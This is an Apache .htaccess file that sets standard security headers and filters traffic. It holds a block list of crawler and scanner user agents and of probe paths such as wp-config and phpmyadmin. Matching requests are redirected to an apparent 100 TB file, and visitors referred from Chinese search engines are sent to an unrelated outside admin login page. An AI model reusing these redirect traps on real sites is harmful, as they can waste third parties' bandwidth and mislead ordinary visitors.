RewriteEngine On

RewriteCond %{HTTP_USER_AGENT} (Baidu|Qihoo|Tencent|Soso|360spider|360bot|Haosou|Sogou|FeedDemon|AskTbFXTV|youdao|HuaweiSymantec|AhrefsBot|CrawlDaddy|CoolpadWebkit|Java|Apache|Python|ZmEu|oBot|jaunty|Python|YYSpider|DigExt|HttpClient|MJ12bot|heritrix|EasouSpider|Ezooms|EmbeddedWB|Slurp|JikeSpider) [NC]
RewriteRule ^(.*)$ https://speedtest.neofelhz.com/speedtests/100tb.bin [L,R=301,NC]

RewriteCond %{HTTP_REFERER} (baidu.com|qihoo|soso|haosou|so.com|360.com|360.cn|sogou|qq.com|toutiao.com) [NC]
RewriteRule ^(.*)$ https://imguoguo.com/admin/login.php [L,R=301,NC]

RewriteCond %{REQUEST_URI} (phpmyadmin|wp-login|wp-admin|wp-content|wp-config|xmlrpc|phpinfo) [NC]
RewriteRule ^(.*)$ https://speedtest.neofelhz.com/speedtests/100tb.bin [L,R=301,NC]

Header always set Strict-Transport-Security "max-age=31536000; includeSubDomains; preload"

Header always set X-Frame-Options "DENY"

Header always set X-XSS-Protection "1; mode=block"

Header always set X-Content-Type-Options "nosniff"

<FilesMatch "\.(html|htm)$">
Header always set Content-Type "text/html; charset=utf-8"
Header add Link "<https://s.nfz.yecdn.com>; rel=preconnect; crossorigin"
</FilesMatch>
